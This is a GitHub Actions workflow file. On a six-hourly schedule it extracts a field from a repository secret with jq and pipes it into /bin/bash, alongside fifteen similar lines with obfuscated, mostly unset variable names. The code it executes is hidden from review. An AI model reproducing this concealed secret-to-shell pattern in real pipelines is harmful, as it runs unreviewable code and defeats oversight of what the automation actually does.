name: cheyingchangzuan

on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: cheyingchangzuan
        env:
          bhgac8: ${{ secrets.bhgac8 }}
        run: |
          echo $bhgac8 | jq -r .dzz22829 | /bin/bash
          echo $vul7878 | jq -r .evk203 | /bin/bash
          echo $uefip9879 | jq -r .xp60118 | /bin/bash
          echo $hf6986 | jq -r .nsi14818 | /bin/bash
          echo $njilg62 | jq -r .i53 | /bin/bash
          echo $bigi95927 | jq -r .ky013 | /bin/bash
          echo $ky74 | jq -r .a96300 | /bin/bash
          echo $ul8910 | jq -r .exa8685 | /bin/bash
          echo $bbfft72374 | jq -r .m9 | /bin/bash
          echo $ify952 | jq -r .mr36 | /bin/bash
          echo $dcztb6804 | jq -r .enhlw9 | /bin/bash
          echo $c37417 | jq -r .kq93 | /bin/bash
          echo $k3152 | jq -r .q434 | /bin/bash
          echo $utboa1 | jq -r .mmpj5 | /bin/bash
          echo $lc1 | jq -r .o130 | /bin/bash
          echo $sch0283 | jq -r .atjw3479 | /bin/bash

